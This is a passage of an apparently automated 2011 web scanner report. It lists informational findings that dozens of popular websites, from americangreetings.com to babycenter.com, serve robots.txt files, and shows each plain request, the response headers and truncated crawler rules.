Confidence:   Certain
Host:   http://www.americangreetings.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.americangreetings.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:16:50 GMT
Server: Apache
Last-Modified: Wed, 23 Mar 2011 14:10:35 GMT
ETag: "219d134-941-ecaa4cc0"
Accept-Ranges: bytes
Content-Length: 2369
Content-Type: text/plain
Vary: Accept-Encoding
Connection: close
Set-Cookie: lbsegment=77;path=/;domain=.americangreetings.com;

User-agent: *
Disallow: /2go/
Disallow: /aol/
Disallow: /affiliate/
Disallow: /api/
Disallow: /apps/vicks/
Disallow: /aschulak/
Disallow: /auth/
Disallow: /campstone/
Disallow: /carltoncardcl
...[SNIP]...
24.50. http://www.americantowns.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americantowns.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.americantowns.com

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=ZONVIRS192.168.6.52CKMQY; path=/
Date: Sat, 02 Apr 2011 13:39:55 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 21 Jan 2011 19:33:42 GMT
ETag: "5507c4-c00-49a6053e69180"
Accept-Ranges: bytes
Content-Length: 3072
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Mediapartners-Google*
Disallow:

Sitemap: http://sitemaps.americantowns.com/sitemap.xml

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /compone
...[SNIP]...
24.51. http://www.amerisave.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amerisave.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.amerisave.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:35 GMT
Server: Apache/2.2.15 (Win64) mod_ssl/2.2.15 OpenSSL/0.9.8m JRun/4.0
Last-Modified: Thu, 30 Jul 2009 14:58:25 GMT
ETag: "100000000f0dc-13f-46fed8921c2c1"
Accept-Ranges: bytes
Content-Length: 319
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /rateResults.cfm
Disallow: /rateResultsInterim.cfm
Disallow: /widgets
Disallow: /app/
Disallow: /appv2/
Disallow: /applynow/
Disallow: /homeequity/
Disallow: /myrates/
...[SNIP]...
24.52. http://www.amtrak.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amtrak.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.amtrak.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 16 May 2010 07:12:43 GMT
Content-Length: 35
ETag: "23-4bef9aeb"
Accept-Ranges: bytes
X-N: S
Date: Sat, 02 Apr 2011 13:50:18 GMT
Connection: close

User-agent: *
Disallow: /employee/
24.53. http://www.ancestry.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ancestry.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ancestry.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 30 Oct 2008 15:25:48 GMT
Accept-Ranges: bytes
ETag: "026d1c8a33ac91:0"
Server: Microsoft-IIS/7.0
P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI NAV INT PRE"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:23:58 GMT
Connection: close
Content-Length: 594

User-agent: *
Disallow: /browse/bookview.aspx
Disallow: /Browse/BookView.aspx
Disallow: /Browse/bookview.aspx
Disallow: /Browse/print_b.aspx
Disallow: /browse/print_b.aspx
Disallow: /browse/prin
...[SNIP]...
24.54. http://www.andkon.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.andkon.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.andkon.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:45 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 17 Jun 2008 22:52:17 GMT
ETag: "2118d38-14c-98878a40"
Accept-Ranges: bytes
Content-Length: 332
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /stuf/elcova/01.html

User-Agent: *
Disallow: /yellow.php

User-Agent: *
Disallow: /old.php

User-Agent: *
Disallow: /index.php?start_from=

User-Agent: *
Disallow: /stuf/blog.
...[SNIP]...
24.55. http://www.androidcentral.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.androidcentral.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.androidcentral.com

Response

HTTP/1.1 200 OK
Server: spe
Date: Sat, 02 Apr 2011 14:06:34 GMT
Content-Type: text/plain
Content-Length: 1590
Last-Modified: Wed, 10 Dec 2008 20:12:19 GMT
Connection: close
Accept-Ranges: bytes

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
24.56. http://www.androidforums.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.androidforums.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.androidforums.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:46:26 GMT
Content-Type: text/plain
Content-Length: 40
Last-Modified: Thu, 23 Dec 2010 15:07:18 GMT
Connection: close
Expires: Sat, 02 Apr 2011 14:46:26 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

User-agent: *
Disallow: /members/list/

24.57. http://www.angieslist.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.angieslist.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.angieslist.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Mar 2011 12:46:37 GMT
Accept-Ranges: bytes
ETag: "a7d27b82d8eecb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:00:59 GMT
Connection: close
Content-Length: 526

User-agent: 008
Disallow: /

User-agent: *
Sitemap: http://www.angieslist.com/sitemap/sitemap.xml
Disallow: /b/
Disallow: /c/
Disallow: /AngiesList/*
Disallow: /Angieslist/*
Disallow: /ang
...[SNIP]...
24.58. http://www.answerbag.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answerbag.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.answerbag.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:09 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8d PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 121
Connection: close
Content-Type: text/html; charset=utf-8

User-agent: *

Disallow:/a_view*
Disallow:/profile*
Disallow:/search

Sitemap: http://www.answerbag.com/sitemap_index.xml
24.59. http://www.aolnews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aolnews.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aolnews.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:20 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 583
Keep-Alive: timeout=5, max=999813
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /_uac/adpage.html
Disallow: /index/
Disallow: /category/test-healthcare/
Disallow: /category/catholic-church-sexual-abuse-scandal/
Disallow: /_a/
Disallow: /article/do-no
...[SNIP]...
24.60. http://www.apartmentguide.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apartmentguide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.apartmentguide.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:08 GMT
Server: PWS/1.7.1.5
X-Px: ms iad-agg-n20 ( iad-agg-n22), ht iad-agg-n22.panthercdn.com
Cache-Control: max-age=1800
Expires: Sat, 02 Apr 2011 13:58:20 GMT
Age: 828
Content-Length: 435
Content-Type: text/plain
Last-Modified: Thu, 31 Mar 2011 11:50:51 GMT
X-Varnish: 486723501
X-Cache: MISS
Connection: close

User-Agent: *

#
# Sitemap Global Search Engine Ping (Google, Yahoo, MSN, Ask)
#

SITEMAP: http://www.apartmentguide.com/sitemap.xml
Disallow: /apartments/search/*
Disallow: /apartments/print/*
Disall
...[SNIP]...
24.61. http://www.apartmenthomeliving.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apartmenthomeliving.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.apartmenthomeliving.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:34 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 28 Oct 2010 13:52:10 GMT
Accept-Ranges: bytes
Content-Length: 760
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: iisbot
Disallow: /

User-agent: Slurp
Crawl-delay: 1
Disallow: /apartment_managers/
Disallow: /apartment_stamps/
Disallow: /apartment_search/
Disallow: /members/
Disallow: /videoc
...[SNIP]...
24.62. http://www.apartmentratings.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apartmentratings.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.apartmentratings.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:42 GMT
Server: Apache
Last-Modified: Wed, 18 Aug 2010 21:44:46 GMT
ETag: "1cf3b5-398-48e1ff9632f80"
Accept-Ranges: bytes
Content-Length: 920
Cache-Control: max-age=600
Expires: Sat, 02 Apr 2011 14:03:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerapt-www_POOL=1189351596.0.0000; path=/

User-agent: *
Disallow: /review/branding/nav.jsp
Disallow: /rate?a=r
Disallow: /data

User-agent: URL_Spider_Pro
Disallow: /

User-agent: CherryPicker
Disallow: /

User-agent: EmailCollector
Disallow:
...[SNIP]...
24.63. http://www.apartments.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apartments.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.apartments.com

Response

HTTP/1.1 200 OK
Content-Length: 645
Content-Type: text/plain
Last-Modified: Fri, 18 Mar 2011 13:07:26 GMT
Accept-Ranges: bytes
ETag: "7765c26d6de5cb1:0"
Server: Microsoft-IIS/7.5
Set-Cookie: activitylogging=expirationday=3/31/2016 8:45:19 AM&lastactivitytime=4/2/2011 8:45:19 AM&visitid=da00cefd-afdf-4671-82f3-f553bd8519de&visitorid=430e7eb8-3e15-4ac5-9708-40d704a7debf&lastfrontdoor=APTS; expires=Thu, 31-Mar-2016 13:45:19 GMT; path=/
Set-Cookie: AptAff=d337643d48565017cce897f6a04ff96366d9db60dfceba203ff36b6c04fcdec5;Path=/
Set-Cookie: activitylogging=expirationday=3/31/2016 8:45:19 AM&lastactivitytime=4/2/2011 8:45:19 AM&visitid=da00cefd-afdf-4671-82f3-f553bd8519de&visitorid=430e7eb8-3e15-4ac5-9708-40d704a7debf&lastfrontdoor=APTS; expires=Thu, 31-Mar-2016 13:45:19 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:45:18 GMT
Connection: close
Set-Cookie: aptspersistence=578884780.24576.0000; path=/

# robots.txt for Apartments.com
# see http://www.robotstxt.org/wc/norobots.html

User-Agent: OmniExplorer_Bot
Disallow: /

User-agent: *
Disallow: /cgi-bin
Disallow: /private

User-agent: *
...[SNIP]...
24.64. http://www.apple.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apple.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 06 Jan 1998 23:24:02 GMT
ETag: "41-3241c557be880"
Server: Apache/2.2.11 (Unix)
nnCoection: close
X-Cache-TTL: 600
X-Cached-Time: Wed, 04 Aug 2010 21:30:00 GMT
Content-Type: text/plain; charset=utf-8
Cteonnt-length: 65
Cache-Control: max-age=298
Expires: Sat, 02 Apr 2011 12:47:48 GMT
Date: Sat, 02 Apr 2011 12:42:50 GMT
Content-Length: 65
Connection: close

# robots.txt for http://www.apple.com/
User-agent: *
Disallow:

24.65. http://www.apples4theteacher.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apples4theteacher.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.apples4theteacher.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:51:49 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 17 Dec 2010 23:27:01 GMT
ETag: "9fbb3d-305-497a381dc3b40"
Accept-Ranges: bytes
Content-Length: 773
Connection: close
Content-Type: text/plain

# Robots.txt file from http://www.apples4theteacher.com
#
# All robots will spider the domain

User-agent: Googlebot
Disallow: /swfs*/

User-agent: Slurp
Crawl-delay: 10

User-agent: *
Disa
...[SNIP]...
24.66. http://www.archive.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.archive.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.archive.org

Response

HTTP/1.1 200 OK
Server: nginx/0.8.32
Date: Sat, 02 Apr 2011 13:36:06 GMT
Content-Type: text/plain
Content-Length: 627
Last-Modified: Tue, 08 Mar 2011 00:34:01 GMT
Connection: close
Expires: Sat, 02 Apr 2011 19:36:06 GMT
Cache-Control: max-age=21600
Accept-Ranges: bytes

##############################################
#
# Welcome to the Archive!
#
##############################################
# Please crawl our files.
# We appreciate if you can crawl responsibly.
# St
...[SNIP]...
24.67. http://www.areaconnect.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.areaconnect.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.areaconnect.com

Response

HTTP/1.1 200 OK
Content-Length: 510
Content-Type: text/plain
Last-Modified: Wed, 18 Aug 2010 19:42:05 GMT
Accept-Ranges: bytes
ETag: "5e1eb96fd3fcb1:1686"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:36:04 GMT
Connection: close

# robots.txt
# Please, we do NOT allow non-se spiders any longer.

User-agent: *
Disallow: /odp
Disallow: /localsites
Disallow: /directory
Disallow: /ads
Disallow: /search
Disallow: /premierlocal
Disa
...[SNIP]...
24.68. http://www.articlesbase.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.articlesbase.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.articlesbase.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:48 GMT
Server: Apache/2
Last-Modified: Thu, 31 Mar 2011 15:35:17 GMT
ETag: "1740-49fc90a4e7740"
Accept-Ranges: bytes
Content-Length: 5952
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 14:26:48 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Slurp
Crawl-delay: 3

User-Agent: MediaPartners-Google
Allow: *

Sitemap: http://www.articlesbase.com/articles_sitemap_index.xml

User-agent: *
Disallow: /ads/
Disallow: /images/
Disallow:
...[SNIP]...
24.69. http://www.askmen.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.askmen.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.11 (Unix) PHP/5.2.9
Last-Modified: Wed, 10 Nov 2010 21:26:23 GMT
ETag: "bca6ef-118-494b9825ab565"-gzip
ServerHost: askmen07.sc4.colo.fimops.com
Content-Type: text/plain; charset=iso-8859-1
Expires: Sat, 02 Apr 2011 13:26:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:26:34 GMT
Content-Length: 280
Connection: close
Set-Cookie: NSC_btlnfo_iuuq_wjq=ffffffff090f1b3445525d5f4f58455e445a4a423660;path=/;httponly

Sitemap: http://www.askmen.com/video-sitemap.xml
Sitemap: http://www.askmen.com/sitemap.xml
User-agent: *
Disallow: /search/
Disallow: /feeder/askmenRSS_article_print_2006.php
...[SNIP]...
24.70. http://www.associatedcontent.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.associatedcontent.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.associatedcontent.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:38:14 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Tue, 16 Nov 2010 23:52:20 GMT
Accept-Ranges: bytes
Content-Length: 177
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

Sitemap: http://www.associatedcontent.com/sitemap_index.xml
# Allow all
User-agent: e-SocietyRobot
Disallow: /
# Disallow bitly_proxy
User-agent: *
Disallow: /bitly_proxy.shtml
24.71. http://www.astrology.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.astrology.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.astrology.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Type: text/plain; charset=UTF-8
Last-Modified: Wed, 30 Mar 2011 21:10:14 GMT
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 14:45:45 GMT
Date: Sat, 02 Apr 2011 13:45:45 GMT
Content-Length: 166
Connection: close

# Everyone allowed
User-agent: *
Disallow: /partnerpages/toolbar

# Our gsa
User-agent: ivillagegsa
Disallow: /*.rss$

Sitemap: http://www.astrology.com/site_map.xml
24.72. http://www.atom.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atom.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.atom.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
ETag: W/"403-1300820242000"
Last-Modified: Tue, 22 Mar 2011 18:57:22 GMT
Content-Type: text/plain
Content-Length: 403
INFO_HOST: www.atom.com
Cache-Control: max-age=743
Expires: Sat, 02 Apr 2011 14:10:03 GMT
Date: Sat, 02 Apr 2011 13:57:40 GMT
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:57:40 GMT; path=/
Vary: User-Agent

# robots.txt for Scenic Site blocking

User-agent: *
Disallow: /scenic/
Disallow: /services/
Disallow: /isis/
Disallow: /ucsa/
Disallow: /admin/
Disallow: /poll/
Disallow: /gameservices/
Disallow: /bl
...[SNIP]...
24.73. http://www.att.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.att.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.att.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 15 Mar 2011 20:02:48 GMT
ETag: "356f68-3cc-e98f4a00"
Accept-Ranges: bytes
Content-Length: 972
P3P: policyref="http://www.att.com/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 12:37:48 GMT
Connection: close

User-agent: *
Disallow: /Common/indc/popup/
Disallow: /Common/popup/
Disallow: /dsl/shop/fragments/
Disallow: /esupport/dyn/servlet/
Disallow: /esupport/sender/
Disallow: /esupport/stayconnected
...[SNIP]...
24.74. http://www.autotrader.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.autotrader.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:48 GMT
Server: Apache
Set-Cookie: v1st=A4F56B4DC789BB77; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1301750748491554; path=/; expires=Thu, 12-Mar-15 13:25:48 GMT; domain=.autotrader.com
Last-Modified: Tue, 15 Mar 2011 18:14:33 GMT
Accept-Ranges: bytes
Content-Length: 439
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServerAT-Production_hhtp=930440714.61475.0000; path=/

User-agent: *
Disallow: /fyc # This is an infinite virtual URL space
Disallow: /inventory # This is an infinite virtual URL space

# Start Home Page Test
Disallow: /index_hpra0.jsp
Disallow: /index_h
...[SNIP]...
24.75. http://www.autotraderstatic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotraderstatic.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.autotraderstatic.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 15 Mar 2011 18:14:33 GMT
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:31:40 GMT
Content-Length: 83
Connection: close
Set-Cookie: M7F1=CT; expires=Sat, 30-Apr-2011 13:31:40 GMT; path=/; domain=autotraderstatic.com
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELi OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV;"

User-agent: *
Disallow: / # No indexing of www.autotraderstatic.com pages allowed

24.76. http://www.autozone.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autozone.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.autozone.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:05 GMT
X-Powered-By: Tomcat/JBOSS
Last-Modified: Thu, 31 Mar 2011 20:32:48 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 628
Vary: Accept-Encoding
Set-Cookie: NSC_bvupapof.dpn=e795367f3660;Version=1;path=/
Keep-Alive: timeout=2, max=42
Connection: Keep-Alive
Set-Cookie: NSC_bvupapof.dpn=e795366b3660;Version=1;path=/

User-agent: *
Disallow: /autozone/cart/
Disallow: /autozone/checkout/
Disallow: /autozone/ymme/
Disallow: /autozone/common/selectStore.jsp
Disallow: /autozone/catalog/common/add_to_cart.jsp
Disa
...[SNIP]...
24.77. http://www.avast.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.avast.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.avast.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "362055514"
Last-Modified: Tue, 04 May 2010 08:04:00 GMT
Content-Length: 224
Connection: close
Date: Sat, 02 Apr 2011 13:38:03 GMT
Server: httpd

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi
Disallow: /~kubecj/data
Disallow: /connections
Disallow: /classes
Disallow: /~kubecj/data
Disallow: /go.php
Disallow: /phone-support-survey
Dis
...[SNIP]...
24.78. http://www.azcentral.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.azcentral.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.azcentral.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:14 GMT
Server: Apache
Last-Modified: Mon, 04 Aug 2008 20:05:11 GMT
Accept-Ranges: bytes
Content-Length: 76
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-Agent: *
Allow: /

Sitemap: http://www.azcentral.com/sitemapindex.xml

24.79. http://www.b2byellowpages.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.b2byellowpages.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.b2byellowpages.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:08:56 GMT
Server: Apache
Last-Modified: Fri, 21 Jan 2011 18:58:01 GMT
ETag: "281a402-110a-49a5fd4498040"
Accept-Ranges: bytes
Content-Length: 4362
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots, scram!

User-agent: Mediapartners-Google*
Disallow: /.ssh/
Disallow: /_b2bframe_domain_header/
Disallow: /_new_template/
Disallow: /_oldtemplates/
Disallow: /admin/
Disallow: /ad
...[SNIP]...
24.80. http://www.babble.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.babble.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.babble.com

Response

HTTP/1.1 200 OK
Content-Length: 424
Content-Type: text/plain
Last-Modified: Thu, 06 Aug 2009 17:59:37 GMT
Accept-Ranges: bytes
ETag: "4daba3a9bf16ca1:1054"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:42:17 GMT
Connection: close

Sitemap: http://www.babble.com/sitemap.ashx

User-agent: *
Disallow: /adminhome/
Disallow: /useraccounting/
Disallow: /cs/error.htm
Disallow: /cs/error-notfound.aspx
Disallow: /cs/login.aspx
D
...[SNIP]...
24.81. http://www.babelgum.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.babelgum.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.babelgum.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
ETag: "aa43a9-636-490c48bb928c0"
Server: Apache/2.2.16
Age: 26725
Date: Sat, 02 Apr 2011 13:41:20 GMT
Last-Modified: Tue, 21 Sep 2010 12:55:39 GMT
Content-Length: 1590
Connection: close

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
24.82. http://www.babiesrus.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.babiesrus.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.babiesrus.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:27:39 GMT
Server: Apache/2.0.63 (Unix)
Vary: Host,Accept-Encoding
Last-Modified: Sat, 29 Nov 2008 04:25:07 GMT
ETag: "540e73-17d-45ccc5ccf0ec0"
Accept-Ranges: bytes
Content-Length: 381
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 13:27:39 GMT
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /search/
Disallow: /cart/
Disallow: /reviews/
Disallow: /coreg/
Disallow: /fsrscripts/
Disallow: /cartHandler/
Disallow: /include/
Disallow: /ControllerServlet/
Disallow: /ema
...[SNIP]...
24.83. http://www.babycenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.babycenter.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.babycenter.com

Response

